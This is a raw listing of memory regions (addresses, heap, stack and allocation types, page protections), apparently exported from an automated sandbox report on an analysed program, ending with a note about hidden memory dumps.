page execute and read and write
3344000
heap
page read and write
35A0000
heap
page read and write
8181000
heap
page read and write
34C8000
heap
page read and write
7730000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
DF8000
heap
page read and write
20B5E5DE000
trusted library allocation
page read and write
21E000
unkown
page readonly
6F3E000
stack
page read and write
233A0000
unclassified section
page execute and read and write
3401000
heap
page read and write
770C000
stack
page read and write
3344000
heap
page read and write
12A1000
unkown
page readonly
2D1448B000
stack
page read and write
9962000
direct allocation
page execute and read and write
8600000
direct allocation
page read and write
378C000
heap
page read and write
2D80000
heap
page read and write
4C4C000
heap
page read and write
3651000
heap
page read and write
3635000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
3401000
heap
page read and write
3651000
heap
page read and write
4C85000
heap
page read and write
950000
unkown
page readonly
7E97000
trusted library allocation
page read and write
3643000
heap
page read and write
821E000
stack
page read and write
70C0000
heap
page read and write
5B40000
heap
page read and write
371A000
heap
page read and write
4690000
heap
page read and write
7FEF000
stack
page read and write
358F000
heap
page read and write
47A0000
trusted library allocation
page read and write
80E0000
direct allocation
page read and write
35CA000
heap
page read and write
7F6000
heap
page read and write
23FB0000
heap
page read and write
23F2C000
heap
page read and write
878D000
stack
page read and write
4BFA000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
4578000
heap
page read and write
35E1000
heap
page read and write
14B0000
heap
page read and write
368E000
heap
page read and write
4D77000
trusted library allocation
page read and write
365E000
heap
page read and write
4AFA000
heap
page read and write
47FE000
stack
page read and write
2C3D000
stack
page read and write
3640000
heap
page read and write
3659000
heap
page read and write
DE0000
unkown
page readonly
3401000
heap
page read and write
7C52000
remote allocation
page execute and read and write
2990000
heap
page read and write
737E000
stack
page read and write
84F0000
trusted library allocation
page execute and read and write
2F3A000
stack
page read and write
21D7D000
direct allocation
page execute and read and write
23F44000
heap
page read and write
3640000
heap
page read and write
84DD000
stack
page read and write
3254000
heap
page read and write
B63000
heap
page read and write
57D0000
trusted library allocation
page read and write
4E6F000
trusted library allocation
page read and write
53E1000
heap
page read and write
23580000
heap
page read and write
5F86000
heap
page read and write
DF0000
heap
page read and write
1B9F6850000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
3640000
heap
page read and write
2DBE000
stack
page read and write
2EE0000
trusted library allocation
page read and write
4580000
heap
page read and write
537F000
stack
page read and write
1290000
unkown
page read and write
864D000
stack
page read and write
5F90000
heap
page read and write
3658000
heap
page read and write
3401000
heap
page read and write
8430000
heap
page read and write
21D79000
direct allocation
page execute and read and write
83AF000
stack
page read and write
50D8000
trusted library allocation
page read and write
3641000
heap
page read and write
7430000
heap
page read and write
23F98000
heap
page read and write
8180000
heap
page read and write
3401000
heap
page read and write
2750000
heap
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
AD8000
heap
page read and write
359A000
heap
page read and write
4450000
trusted library allocation
page read and write
20B74A20000
heap
page read and write
4890000
heap
page read and write
1B9F68BF000
heap
page read and write
2DDA000
heap
page read and write
28C0000
unkown
page read and write
3640000
heap
page read and write
80D0000
direct allocation
page read and write
6750000
trusted library allocation
page read and write
366C000
heap
page read and write
BB1000
heap
page read and write
826C000
stack
page read and write
3401000
heap
page read and write
3401000
heap
page read and write
539F000
stack
page read and write
D50000
heap
page read and write
5E52000
remote allocation
page execute and read and write
3401000
heap
page read and write
7FFD9B696000
trusted library allocation
page read and write
23F2C000
heap
page read and write
210000
unkown
page readonly
3401000
heap
page read and write
2D8C000
stack
page read and write
3401000
heap
page read and write
85E0000
direct allocation
page read and write
27C0000
heap
page read and write
5F86000
heap
page read and write
7F00000
heap
page read and write
82F000
heap
page read and write
3401000
heap
page read and write
3651000
heap
page read and write
74A0000
trusted library allocation
page read and write
21A13000
heap
page read and write
2B30000
trusted library section
page read and write
217AC000
stack
page read and write
3540000
trusted library allocation
page read and write
6DE0000
direct allocation
page read and write
4950000
heap
page execute and read and write
3651000
heap
page read and write
4C9D000
heap
page read and write
6C00000
direct allocation
page read and write
6AE000
stack
page read and write
4C4C000
heap
page read and write
3401000
heap
page read and write
3630000
heap
page read and write
20B5AC65000
heap
page read and write
36CA000
heap
page read and write
58B1000
trusted library allocation
page read and write
3254000
heap
page read and write
5EF0000
heap
page read and write
3401000
heap
page read and write
20B74B67000
heap
page execute and read and write
3401000
heap
page read and write
2D133FC000
stack
page read and write
4C69000
heap
page read and write
2D134BE000
stack
page read and write
82D8000
heap
page read and write
481D000
stack
page read and write
3401000
heap
page read and write
21E000
unkown
page readonly
76C0000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
3B8E000
direct allocation
page execute and read and write
20B5A8E0000
heap
page read and write
45D0000
trusted library allocation
page read and write
69BE000
stack
page read and write
3344000
heap
page read and write
2CBD000
heap
page read and write
23CCD000
stack
page read and write
2B48000
heap
page read and write
20B74B9E000
heap
page read and write
3680000
trusted library allocation
page read and write
2BB8000
heap
page read and write
34EE000
heap
page read and write
562E000
trusted library allocation
page read and write
211000
unkown
page execute read
81AE000
heap
page read and write
37FD000
stack
page read and write
6BE0000
direct allocation
page read and write
819C000
stack
page read and write
832000
heap
page read and write
3401000
heap
page read and write
3641000
heap
page read and write
11B0000
heap
page read and write
2310000
heap
page read and write
400000
system
page execute and read and write
B62000
heap
page read and write
3344000
heap
page read and write
32D0000
heap
page readonly
4B0A000
heap
page read and write
DB1000
unkown
page readonly
23F83000
heap
page read and write
4462000
trusted library allocation
page read and write
2343D000
unclassified section
page execute and read and write
5B4F000
trusted library allocation
page read and write
750000
heap
page read and write
4B06000
heap
page read and write
1B9F8501000
trusted library allocation
page read and write
21F92000
direct allocation
page execute and read and write
4627000
trusted library allocation
page read and write
7450000
trusted library allocation
page execute and read and write
14CF000
heap
page read and write
211000
unkown
page execute read
2F90000
heap
page read and write
74DB000
heap
page read and write
9FA000
heap
page read and write
366B000
heap
page read and write
4B0A000
heap
page read and write
8181000
heap
page read and write
4374000
unkown
page read and write
3848000
heap
page read and write
3401000
heap
page read and write
227000
unkown
page readonly
7480000
trusted library allocation
page read and write
39E6000
heap
page read and write
DD0000
unkown
page readonly
74E0000
trusted library allocation
page read and write
1180000
unkown
page readonly
838000
stack
page read and write
5F90000
heap
page read and write
366F2000
system
page read and write
3344000
heap
page read and write
2FFE000
stack
page read and write
5F22000
heap
page read and write
868D000
stack
page read and write
3255000
heap
page read and write
115C000
stack
page read and write
74C0000
trusted library allocation
page read and write
21349000
heap
page read and write
3A08000
unkown
page read and write
4AC9000
trusted library allocation
page read and write
2EED000
trusted library allocation
page execute and read and write
2D27000
heap
page read and write
23F1A000
heap
page read and write
216DE000
stack
page read and write
580000
heap
page read and write
3254000
heap
page read and write
6B0E000
stack
page read and write
13FE000
stack
page read and write
9F5000
heap
page read and write
4480000
trusted library allocation
page read and write
D20000
unkown
page readonly
74E7000
heap
page read and write
7FAD000
stack
page read and write
8180000
direct allocation
page read and write
5094000
unclassified section
page read and write
8690000
trusted library allocation
page read and write
82F0000
heap
page read and write
20B5C310000
trusted library allocation
page read and write
2B7C000
heap
page read and write
71E000
stack
page read and write
7A0000
heap
page read and write
23F3C000
heap
page read and write
6A40000
heap
page execute and read and write
36CA000
heap
page read and write
23090000
direct allocation
page read and write
817000
heap
page read and write
7FFD9B79A000
trusted library allocation
page read and write
3401000
heap
page read and write
7770000
trusted library allocation
page read and write
5DA0000
direct allocation
page read and write
3645000
heap
page read and write
D6592FF000
stack
page read and write
328F000
stack
page read and write
4052000
remote allocation
page execute and read and write
366C000
heap
page read and write
81A0000
trusted library allocation
page read and write
2E1B000
heap
page read and write
5E30000
direct allocation
page read and write
23D0E000
stack
page read and write
4360000
heap
page read and write
456000
system
page execute and read and write
2AB0000
heap
page read and write
3830000
heap
page read and write
There are 1920 hidden memdumps, click here to show them.